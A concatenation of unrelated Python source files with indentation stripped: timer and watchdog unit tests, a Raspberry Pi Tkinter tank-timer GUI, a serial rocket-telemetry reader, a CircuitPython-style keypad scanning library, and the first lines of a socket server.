def test_get_timer_recursive(self):
"""
If a function acquires a countdown timer with default scope,
then recursive calls to the function should re-acquire the
timer rather than creating a new one. That is only the last
recursive call's timer will take effect.
"""
self.server.start()
timer.configure(timer.LocalTimerClient(self.mp_queue))
# func should not time out
def func(n):
if n > 0:
with timer.expires(after=0.1):
func(n - 1)
time.sleep(0.05)
func(4)
# func2 should time out
def func2(n):
if n > 0:
with timer.expires(after=0.1):
func2(n - 1)
time.sleep(0.2)
p = mp.Process(target=func2, args=(2,))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
@staticmethod
def _run(mp_queue, timeout, duration):
client = timer.LocalTimerClient(mp_queue)
timer.configure(client)
with timer.expires(after=timeout):
time.sleep(duration)
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
def test_timer(self):
timeout = 0.1
duration = 1
p = mp.Process(target=self._run, args=(self.mp_queue, timeout, duration))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
def _enqueue_on_interval(mp_queue, n, interval, sem):
"""
enqueues ``n`` timer requests into ``mp_queue`` one element per
interval seconds. Releases the given semaphore once before going to work.
"""
sem.release()
for i in range(0, n):
mp_queue.put(TimerRequest(i, "test_scope", 0))
time.sleep(interval)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS):
class MultiprocessingRequestQueueTest(unittest.TestCase):
def test_get(self):
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
requests = request_queue.get(1, timeout=0.01)
self.assertEqual(0, len(requests))
request = TimerRequest(1, "test_scope", 0)
mp_queue.put(request)
requests = request_queue.get(2, timeout=0.01)
self.assertEqual(1, len(requests))
self.assertIn(request, requests)
def test_get_size(self):
"""
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=n*interval+delta)``
yields all ``n`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(target=_enqueue_on_interval, args=(mp_queue, n, interval, sem))
p.start()
sem.acquire() # blocks until the process has started to run the function
timeout = interval * (n + 1)
start = time.time()
requests = request_queue.get(n, timeout=timeout)
self.assertLessEqual(time.time() - start, timeout + interval)
self.assertEqual(n, len(requests))
def test_get_less_than_size(self):
"""
Tests slow producer.
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=(interval * n/2))``
yields at most ``n/2`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(target=_enqueue_on_interval, args=(mp_queue, n, interval, sem))
p.start()
sem.acquire() # blocks until the process has started to run the function
requests = request_queue.get(n, timeout=(interval * (n / 2)))
self.assertLessEqual(n / 2, len(requests))
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS):
class LocalTimerServerTest(unittest.TestCase):
def setUp(self):
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
def tearDown(self):
self.server.stop()
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
def test_watchdog_call_count(self):
"""
checks that the watchdog function ran wait/interval +- 1 times
"""
self.server._run_watchdog = mock.MagicMock(wraps=self.server._run_watchdog)
wait = 0.1
self.server.start()
time.sleep(wait)
self.server.stop()
watchdog_call_count = self.server._run_watchdog.call_count
self.assertGreaterEqual(watchdog_call_count, int(wait / self.max_interval) - 1)
self.assertLessEqual(watchdog_call_count, int(wait / self.max_interval) + 1)
def test_watchdog_empty_queue(self):
"""
checks that the watchdog can run on an empty queue
"""
self.server._run_watchdog()
def _expired_timer(self, pid, scope):
expired = time.time() - 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=expired)
def _valid_timer(self, pid, scope):
valid = time.time() + 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=valid)
def _release_timer(self, pid, scope):
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=-1)
@sandcastle_skip_if(TEST_WITH_TSAN, "test is tsan incompatible")
@mock.patch("os.kill")
def test_expired_timers(self, mock_os_kill):
"""
tests that a single expired timer on a process should terminate
the process and clean up all pending timers that was owned by the process
"""
test_pid = -3
self.mp_queue.put(self._expired_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_called_once_with(test_pid, signal.SIGKILL)
@mock.patch("os.kill")
def test_acquire_release(self, mock_os_kill):
"""
tests that:
1. a timer can be acquired then released (should not terminate process)
2. a timer can be vacuously released (e.g. no-op)
"""
test_pid = -3
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_not_called()
@mock.patch("os.kill")
def test_valid_timers(self, mock_os_kill):
"""
tests that valid timers are processed correctly and the process is left alone
"""
self.mp_queue.put(self._valid_timer(pid=-3, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-3, scope="test2"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test2"))
self.server._run_watchdog()
self.assertEqual(4, len(self.server._timers))
self.assertTrue((-3, "test1") in self.server._timers)
self.assertTrue((-3, "test2") in self.server._timers)
self.assertTrue((-2, "test1") in self.server._timers)
self.assertTrue((-2, "test2") in self.server._timers)
mock_os_kill.assert_not_called()
if __name__ == "__main__":
run_tests()
|
tanksimulatortest4.py
|
import tkinter as tk
from tkinter import *
#import pygame
import time
import tkinter.messagebox
import threading
import RPi.GPIO as GPIO
root=Tk()
root.title("Tank Simulator")
root.configure(bg="powder blue")
#root.resizable(width=True,height=True)
root.geometry("1920x1080")
GPIO.setmode(GPIO.BOARD)
GPIO.setup(40,GPIO.IN)
GPIO.setup(38,GPIO.IN)
GPIO.setup(37,GPIO.IN)
GPIO.setup(36,GPIO.IN)
GPIO.setup(35,GPIO.IN)
GPIO.setup(33,GPIO.IN)
GPIO.setup(32,GPIO.IN)
GPIO.setup(31,GPIO.IN)
GPIO.setup(29,GPIO.IN)
GPIO.setup(16,GPIO.IN)
GPIO.setup(15,GPIO.IN)
#pygame.mixer.init()
#def play():
#pygame.mixer.music.load(
def entrybox(l1,l2,l3,m1,min):
sec = StringVar()
Entry(root, textvariable=sec, width = 3,justify='center',font = 'Helvetica 14').place(width=30,height=40,x=l1, y=m1)
sec.set('00')
mins= StringVar()
Entry(root, textvariable=mins, width = 3,justify='center',font = 'Helvetica 14').place(width=30,height=40,x=l2, y=m1)
mins.set(min)
hrs = StringVar()
Entry(root, textvariable=hrs, width = 3,justify='center',font = 'Helvetica 14').place(width=30,height=40,x=l3, y=m1)
hrs.set('00')
time=[hrs,mins,sec]
return time
e1=entrybox(80,50,20,120,15)
e2=entrybox(220,190,160,120,10)
e3=entrybox(360,330,300,120,5)
e4=entrybox(500,470,440,120,5)
e5=entrybox(640,610,580,120,5)
e6=entrybox(780,750,720,120,5)
e7=entrybox(80,50,20,500,5)
e8=entrybox(220,190,160,500,10)
e9=entrybox(360,330,300,500,5)
e10=entrybox(500,470,440,500,5)
e11=entrybox(640,610,580,500,5)
calc = Frame(root)
calc.grid()
# label_1=Label(root,width=20,height=2,font=('arial',30,'bold'),bd=4,text="Scientific Calculator",justify=CENTER).grid(row=0,column=4,columnspan=5)
#lab1 = Label(Fr1, text="Tank_1", bg="Yellow", width=8,fg="Black", font=("none", 30, "bold"))grid(row=1,column=0,padx=10)
t1 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_1"))
t1.grid(row=1,column=1,padx=10)
t2 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_2"))
t2.grid(row=1,column=2,padx=10)
t3 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_3"))
t3.grid(row=1,column=3,padx=10)
t4 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_4"))
t4.grid(row=1,column=4,padx=10)
t5 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_5"))
t5.grid(row=1,column=5,padx=10)
t6 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_6"))
t6.grid(row=1,column=6,padx=10)
t7 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_7"))
t7.grid(row=2,column=1,pady=300)
t8 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_8"))
t8.grid(row=2,column=2,pady=300)
t9= Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_9"))
t9.grid(row=2,column=3,pady=300)
t10 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_10"))
t10.grid(row=2,column=4,pady=300)
t11 = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_11"))
t11.grid(row=2,column=5,pady=300)
#tankName = ["Tank_1","Tank_2","Tank_3","Tank_4","Tank_5"]
#tankLabel = []
#for tnum, tname in enumerate(tankName):
#label = Label(root,width=7,height=2,font=('arial',20,'bold'),bg="yellow",bd=5,text=("Tank_"+str(tnum+1))).grid(row=1,column=tnum,padx=10)
#if (tname=="Tank_1"):
#tankLabel.append(label)
#print(tankLabel)
#Create Entry Widgets for HH MM SS
# sec = StringVar()
# Entry(win, textvariable=sec, width = 2, font = 'Helvetica 14').place(x=220, y=120)
# sec.set('00')
# mins= StringVar()
# Entry(win, textvariable = mins, width =2, font = 'Helvetica
# 14').place(x=180, y=120)
# mins.set('00')
# hrs= StringVar()
# Entry(win, textvariable = hrs, width =2, font = 'Helvetica 14').place(x=142, y=120)
# hrs.set('00')
# #Define the function for the timer
def countdowntimer(hrs,mins,sec):
times = int(hrs.get())*3600+ int(mins.get())*60 + int(sec.get())
while times > -1:
minute,second = (times // 60 , times % 60)
hour =0
if minute > 60:
hour , minute = (minute // 60 , minute % 60)
sec.set(second)
mins.set(minute)
hrs.set(hour)
#Update the time
root.update()
time.sleep(1)
if(times == 0):
sec.set('00')
mins.set('15')
hrs.set('00')
times -= 1
def gogreen(t):
print("here")
t.config(bg="#00ff00")
def checkloop(t,pin,e1,e2,e3):
b=False
while True:
if GPIO.input(pin) == 1:
if b== False :
gogreen(t)
#labelText.set("on")
print ("on")
countdowntimer(e1,e2,e3)
b = True
else:
# labelText.set("off")
print ("off")
b = False
while GPIO.input(pin) == 1: pass
Startbutton = Button(root, text='START_1', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t1),threading.Thread(target=countdowntimer, args=(e1[0],e1[1],e1[2])).start()]).place(x=20, y=180)
Startbutton2 = Button(root, text='START_2', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t2),threading.Thread(target=countdowntimer, args=(e2[0],e2[1],e2[2])).start()]).place(x=160, y=180)
Startbutton3 = Button(root, text='START_3', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t3),threading.Thread(target=countdowntimer, args=(e3[0],e3[1],e3[2])).start()]).place(x=300, y=180)
Startbutton4 = Button(root, text='START_4', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t4),threading.Thread(target=countdowntimer, args=(e4[0],e4[1],e4[2])).start()]).place(x=440, y=180)
Startbutton5 = Button(root, text='START_5', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t5),threading.Thread(target=countdowntimer, args=(e5[0],e5[1],e5[2])).start()]).place(x=580, y=180)
Startbutton6 = Button(root, text='START_6', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t6),threading.Thread(target=countdowntimer, args=(e6[0],e6[1],e6[2])).start()]).place(x=720, y=180)
Startbutton7 = Button(root, text='START_7', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t7),threading.Thread(target=countdowntimer, args=(e7[0],e7[1],e7[2])).start()]).place(x=20, y=560)
Startbutton8 = Button(root, text='START_8', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t8),threading.Thread(target=countdowntimer, args=(e8[0],e8[1],e8[2])).start()]).place(x=160, y=560)
Startbutton9 = Button(root, text='START_9', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t9),threading.Thread(target=countdowntimer, args=(e9[0],e9[1],e9[2])).start()]).place(x=300, y=560)
Startbutton10 = Button(root, text='START_10', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t10),threading.Thread(target=countdowntimer, args=(e10[0],e10[1],e10[2])).start()]).place(x=440, y=560)
Startbutton11 = Button(root, text='START_11', bd ='2', bg = 'IndianRed1',font =('Helvetica bold',10), command = lambda:[gogreen(t11),threading.Thread(target=countdowntimer, args=(e11[0],e11[1],e11[2])).start()]).place(x=580, y=560)
Exitbutton = Button(root, text="Exit",bg="red", command=root.destroy).place(x=1750, y=0)
threading.Thread(target=checkloop,args=(t1,40,e1[0],e1[1],e1[2])).start()
threading.Thread(target=checkloop,args=(t2,38,e2[0],e2[1],e2[2])).start()
threading.Thread(target=checkloop,args=(t3,37,e3[0],e3[1],e3[2])).start()
threading.Thread(target=checkloop,args=(t4,36,e4[0],e4[1],e4[2])).start()
threading.Thread(target=checkloop,args=(t5,35,e5[0],e5[1],e5[2])).start()
threading.Thread(target=checkloop,args=(t6,33,e6[0],e6[1],e6[2])).start()
threading.Thread(target=checkloop,args=(t7,32,e7[0],e7[1],e7[2])).start()
threading.Thread(target=checkloop,args=(t8,31,e8[0],e8[1],e8[2])).start()
threading.Thread(target=checkloop,args=(t9,29,e9[0],e9[1],e9[2])).start()
threading.Thread(target=checkloop,args=(t10,16,e10[0],e10[1],e10[2])).start()
threading.Thread(target=checkloop,args=(t11,15,e11[0],e11[1],e11[2])).start()
#pack
#t1.pack()
#t2.pack()
#t3.pack()
#Startbutton.pack()
# win.mainloop()
#========================================================================================================================================#
# def App():
# Win_App=Tk()
# Win_App.title("Life Apps Calculator")
# Win_App.configure(bg="Orange")
# Win_App.resizable(width=False,height=False)
# Win_App.geometry("450x580")
# life_inter = Frame(Win_App)
# life=('BMI','AGE','Discount','Percent','Date','Length','Area','Volume','currency','Per-Loan','Split-Bill','GST')
# i=0
# life_btn=[]
# for j in range(1,5):
# for k in range(3):
# life_btn.append(Button(Win_App,width=8,height=3,font=('arial',20,'bold'),bd=4,text=life[i]))
# life_btn[i].grid(row=j,column=k,pady=2)
# i+=1
# =========================================================================================================================================#
# menubar=Menu(root)
# root.configure(menu=menubar)
root.mainloop()
|
serial_data_producer.py
|
import glob
import struct
import sys
import threading
import serial
from src.data_producer import DataProducer
from src.realtime.checksum_validator import ChecksumValidator
from src.rocket_packet.rocket_packet_parser import RocketPacketParser
from src.rocket_packet.rocket_packet_repository import RocketPacketRepository
class NoConnectedDeviceException(Exception):
"""Raised when data acquisition is started with no device connected"""
class SerialDataProducer(DataProducer):
def __init__(self, lock: threading.Lock, rocket_packet_repository: RocketPacketRepository,
rocket_packet_parser: RocketPacketParser, checksum_validator: ChecksumValidator, baudrate=9600,
start_character=b's', sampling_frequency=1.0):
super().__init__(lock)
self.rocket_packet_repository = rocket_packet_repository
self.rocket_packet_parser = rocket_packet_parser
self.checksum_validator = checksum_validator
self.unsaved_data = False
self.port = serial.Serial()
self.port.baudrate = baudrate
self.port.timeout = 1 / sampling_frequency
self.start_character = start_character
# RocketPacket data + 1 byte for checksum
self.num_bytes_to_read = self.rocket_packet_parser.get_number_of_bytes() + 1
def start(self):
ports = self.detect_serial_ports()
if not ports:
raise NoConnectedDeviceException("Aucun récepteur connecté")
self.port.port = ports[0]
self.port.open()
self.is_running = True
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
while self.is_running:
c = self.port.read(1)
if c == self.start_character:
data_bytes = self.port.read(self.num_bytes_to_read)
if self.checksum_validator.validate(data_bytes):
try:
rocket_packet = self.rocket_packet_parser.parse(data_bytes[:-1])
self.add_rocket_packet(rocket_packet)
self.unsaved_data = True
except struct.error as e:
"""
This error can occur if we don't read enough bytes on the serial port or if the packet format is
incorrect.
"""
print("Invalid packet: " + str(e))
self.port.close()
def save(self, filename: str):
self.rocket_packet_repository.save(filename, self.available_rocket_packets, self.rocket_packet_parser)
self.unsaved_data = False
def has_unsaved_data(self):
return self.unsaved_data
def clear_rocket_packets(self):
self.lock.acquire()
self.available_rocket_packets.clear()
self.unsaved_data = False
self.lock.release()
@staticmethod
def detect_serial_ports():
""" Lists serial port names
:raises EnvironmentError
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
|
keypad.py
|
"""
`keypad` - Support for scanning keys and key matrices
===========================================================
See `CircuitPython:keypad` in CircuitPython for more details.
* Author(s): Melissa LeBlanc-Williams
"""
import time
import threading
from collections import deque
import digitalio
class Event:
"""A key transition event."""
def __init__(self, key_number=0, pressed=True):
"""
Create a key transition event, which reports a key-pressed or key-released transition.
:param int key_number: the key number
:param bool pressed: ``True`` if the key was pressed; ``False`` if it was released.
"""
self._key_number = key_number
self._pressed = pressed
@property
def key_number(self):
"""The key number."""
return self._key_number
@property
def pressed(self):
"""
``True`` if the event represents a key down (pressed) transition.
The opposite of `released`.
"""
return self._pressed
@property
def released(self):
"""
``True`` if the event represents a key up (released) transition.
The opposite of `pressed`.
"""
return not self._pressed
def __eq__(self, other):
"""
Two `Event` objects are equal if their `key_number`
and `pressed`/`released` values are equal.
"""
return self.key_number == other.key_number and self.pressed == other.pressed
def __hash__(self):
"""Returns a hash for the `Event`, so it can be used in dictionaries, etc.."""
return hash(self._key_number)
def __repr__(self):
"""Return a textual representation of the object"""
return "<Event: key_number {} {}>".format(
self.key_number, "pressed" if self._pressed else "released"
)
class _EventQueue:
"""
A queue of `Event` objects, filled by a `keypad` scanner such as `Keys` or `KeyMatrix`.
You cannot create an instance of `_EventQueue` directly. Each scanner creates an
instance when it is created.
"""
def __init__(self, max_events):
self._events = deque([], max_events)
self._overflowed = False
def get(self):
"""
Return the next key transition event. Return ``None`` if no events are pending.
Note that the queue size is limited; see ``max_events`` in the constructor of
a scanner such as `Keys` or `KeyMatrix`.
If a new event arrives when the queue is full, the event is discarded, and
`overflowed` is set to ``True``.
:return: the next queued key transition `Event`
:rtype: Optional[Event]
"""
if not self._events:
return None
return self._events.popleft()
def get_into(self, event):
"""Store the next key transition event in the supplied event, if available,
and return ``True``.
If there are no queued events, do not touch ``event`` and return ``False``.
The advantage of this method over ``get()`` is that it does not allocate storage.
Instead you can reuse an existing ``Event`` object.
Note that the queue size is limited; see ``max_events`` in the constructor of
a scanner such as `Keys` or `KeyMatrix`.
:return ``True`` if an event was available and stored, ``False`` if not.
:rtype: bool
"""
if not self._events:
return False
next_event = self._events.popleft()
# pylint: disable=protected-access
event._key_number = next_event._key_number
event._pressed = next_event._pressed
# pylint: enable=protected-access
return True
def clear(self):
"""
Clear any queued key transition events. Also sets `overflowed` to ``False``.
"""
self._events.clear()
self._overflowed = False
def __bool__(self):
"""``True`` if `len()` is greater than zero.
This is an easy way to check if the queue is empty.
"""
return len(self._events) > 0
def __len__(self):
"""Return the number of events currently in the queue. Used to implement ``len()``."""
return len(self._events)
@property
def overflowed(self):
"""
``True`` if an event could not be added to the event queue because it was full. (read-only)
Set to ``False`` by `clear()`.
"""
return self._overflowed
def keypad_eventqueue_record(self, key_number, current):
"""Record a new event"""
if len(self._events) == self._events.maxlen:
self._overflowed = True
else:
self._events.append(Event(key_number, current))
class _KeysBase:
def __init__(self, interval, max_events, scanning_function):
self._interval = interval
self._last_scan = time.monotonic()
self._events = _EventQueue(max_events)
self._scanning_function = scanning_function
self._scan_thread = threading.Thread(target=self._scanning_loop, daemon=True)
self._scan_thread.start()
@property
def events(self):
"""The EventQueue associated with this Keys object. (read-only)"""
return self._events
def deinit(self):
"""Stop scanning"""
if self._scan_thread.is_alive():
self._scan_thread.join()
def __enter__(self):
"""No-op used by Context Managers."""
return self
def __exit__(self, exception_type, exception_value, traceback):
"""
Automatically deinitializes when exiting a context. See
:ref:`lifetime-and-contextmanagers` for more info.
"""
self.deinit()
def _scanning_loop(self):
while True:
remaining_delay = self._interval - (time.monotonic() - self._last_scan)
if remaining_delay > 0:
time.sleep(remaining_delay)
self._last_scan = time.monotonic()
self._scanning_function()
class Keys(_KeysBase):
"""Manage a set of independent keys."""
def __init__(
self, pins, *, value_when_pressed, pull=True, interval=0.02, max_events=64
):
"""
Create a `Keys` object that will scan keys attached to the given sequence of pins.
Each key is independent and attached to its own pin.
An `EventQueue` is created when this object is created and is available in the
`events` attribute.
:param Sequence[microcontroller.Pin] pins: The pins attached to the keys.
The key numbers correspond to indices into this sequence.
:param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
``False`` if the pin reads low (is grounded) when the key is pressed.
All the pins must be connected in the same way.
:param bool pull: ``True`` if an internal pull-up or pull-down should be
enabled on each pin. A pull-up will be used if ``value_when_pressed`` is ``False``;
a pull-down will be used if it is ``True``.
If an external pull is already provided for all the pins, you can set
``pull`` to ``False``.
However, enabling an internal pull when an external one is already present is not
a problem;
it simply uses slightly more current.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
self._digitalinouts = []
for pin in pins:
dio = digitalio.DigitalInOut(pin)
if pull:
dio.pull = (
digitalio.Pull.DOWN if value_when_pressed else digitalio.Pull.UP
)
self._digitalinouts.append(dio)
self._currently_pressed = [False] * len(pins)
self._previously_pressed = [False] * len(pins)
self._value_when_pressed = value_when_pressed
super().__init__(interval, max_events, self._keypad_keys_scan)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
for dio in self._digitalinouts:
dio.deinit()
def reset(self):
"""Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._currently_pressed = self._previously_pressed = [False] * self.key_count
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return len(self._digitalinouts)
def _keypad_keys_scan(self):
for key_number, dio in enumerate(self._digitalinouts):
self._previously_pressed[key_number] = self._currently_pressed[key_number]
current = dio.value == self._value_when_pressed
self._currently_pressed[key_number] = current
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
class KeyMatrix(_KeysBase):
"""Manage a 2D matrix of keys with row and column pins."""
# pylint: disable=too-many-arguments
def __init__(
self,
row_pins,
column_pins,
columns_to_anodes=True,
interval=0.02,
max_events=64,
):
"""
Create a `Keys` object that will scan the key matrix attached to the given row and
column pins.
There should not be any external pull-ups or pull-downs on the matrix:
``KeyMatrix`` enables internal pull-ups or pull-downs on the pins as necessary.
The keys are numbered sequentially from zero. A key number can be computed
by ``row * len(column_pins) + column``.
An `EventQueue` is created when this object is created and is available in the `events`
attribute.
:param Sequence[microcontroller.Pin] row_pins: The pins attached to the rows.
:param Sequence[microcontroller.Pin] column_pins: The pins attached to the colums.
:param bool columns_to_anodes: Default ``True``.
If the matrix uses diodes, the diode anodes are typically connected to the column pins,
and the cathodes should be connected to the row pins. If your diodes are reversed,
set ``columns_to_anodes`` to ``False``.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
self._row_digitalinouts = []
for row_pin in row_pins:
row_dio = digitalio.DigitalInOut(row_pin)
row_dio.switch_to_input(
pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
)
self._row_digitalinouts.append(row_dio)
self._column_digitalinouts = []
for column_pin in column_pins:
col_dio = digitalio.DigitalInOut(column_pin)
col_dio.switch_to_input(
pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
)
self._column_digitalinouts.append(col_dio)
self._currently_pressed = [False] * len(column_pins) * len(row_pins)
self._previously_pressed = [False] * len(column_pins) * len(row_pins)
self._columns_to_anodes = columns_to_anodes
super().__init__(interval, max_events, self._keypad_keymatrix_scan)
# pylint: enable=too-many-arguments
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return len(self._row_digitalinouts) * len(self._column_digitalinouts)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
for row_dio in self._row_digitalinouts:
row_dio.deinit()
for col_dio in self._column_digitalinouts:
col_dio.deinit()
def reset(self):
"""
Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._previously_pressed = self._currently_pressed = [False] * self.key_count
def _row_column_to_key_number(self, row, column):
return row * len(self._column_digitalinouts) + column
def _keypad_keymatrix_scan(self):
for row, row_dio in enumerate(self._row_digitalinouts):
row_dio.switch_to_output(
value=(not self._columns_to_anodes),
drive_mode=digitalio.DriveMode.PUSH_PULL,
)
for col, col_dio in enumerate(self._column_digitalinouts):
key_number = self._row_column_to_key_number(row, col)
self._previously_pressed[key_number] = self._currently_pressed[
key_number
]
current = col_dio.value != self._columns_to_anodes
self._currently_pressed[key_number] = current
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
row_dio.value = self._columns_to_anodes
row_dio.switch_to_input(
pull=(
digitalio.Pull.UP
if self._columns_to_anodes
else digitalio.Pull.DOWN
)
)
class ShiftRegisterKeys(_KeysBase):
"""Manage a set of keys attached to an incoming shift register."""
def __init__(
self,
*,
clock,
data,
latch,
value_to_latch=True,
key_count,
value_when_pressed,
interval=0.02,
max_events=64
):
"""
Create a `Keys` object that will scan keys attached to a parallel-in serial-out
shift register like the 74HC165 or CD4021.
Note that you may chain shift registers to load in as many values as you need.
Key number 0 is the first (or more properly, the zero-th) bit read. In the
74HC165, this bit is labeled ``Q7``. Key number 1 will be the value of ``Q6``, etc.
An `EventQueue` is created when this object is created and is available in the
`events` attribute.
:param microcontroller.Pin clock: The shift register clock pin.
The shift register should clock on a low-to-high transition.
:param microcontroller.Pin data: the incoming shift register data pin
:param microcontroller.Pin latch:
Pin used to latch parallel data going into the shift register.
:param bool value_to_latch: Pin state to latch data being read.
``True`` if the data is latched when ``latch`` goes high
``False`` if the data is latched when ``latch goes low.
The default is ``True``, which is how the 74HC165 operates. The CD4021 latch is
the opposite. Once the data is latched, it will be shifted out by toggling the
clock pin.
:param int key_count: number of data lines to clock in
:param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
``False`` if the pin reads low (is grounded) when the key is pressed.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
clock_dio = digitalio.DigitalInOut(clock)
clock_dio.switch_to_output(
value=False, drive_mode=digitalio.DriveMode.PUSH_PULL
)
self._clock = clock_dio
data_dio = digitalio.DigitalInOut(data)
data_dio.switch_to_input()
self._data = data_dio
latch_dio = digitalio.DigitalInOut(latch)
latch_dio.switch_to_output(value=True, drive_mode=digitalio.DriveMode.PUSH_PULL)
self._latch = latch_dio
self._value_to_latch = value_to_latch
self._currently_pressed = [False] * key_count
self._previously_pressed = [False] * key_count
self._value_when_pressed = value_when_pressed
self._key_count = key_count
super().__init__(interval, max_events, self._keypad_shiftregisterkeys_scan)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
self._clock.deinit()
self._data.deinit()
self._latch.deinit()
def reset(self):
"""
Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._currently_pressed = self._previously_pressed = [False] * self._key_count
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return self._key_count
@property
def events(self):
"""The ``EventQueue`` associated with this `Keys` object. (read-only)"""
return self._events
def _keypad_shiftregisterkeys_scan(self):
self._latch.value = self._value_to_latch
for key_number in range(self._key_count):
self._clock.value = False
self._previously_pressed[key_number] = self._currently_pressed[key_number]
current = self._data.value == self._value_when_pressed
self._currently_pressed[key_number] = current
self._clock.value = True
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
self._latch.value = not self._value_to_latch
|
server.py
|
import socket
import threading
import time
print(socket.gethostname())
PORT=5060
FORMAT='utf-8'
SERVER_NAME=socket.gethostname()
IP_ADRESS=socket.gethostbyname(SERVER_NAME)
ADRESS_DEF=(IP_ADRESS,PORT)
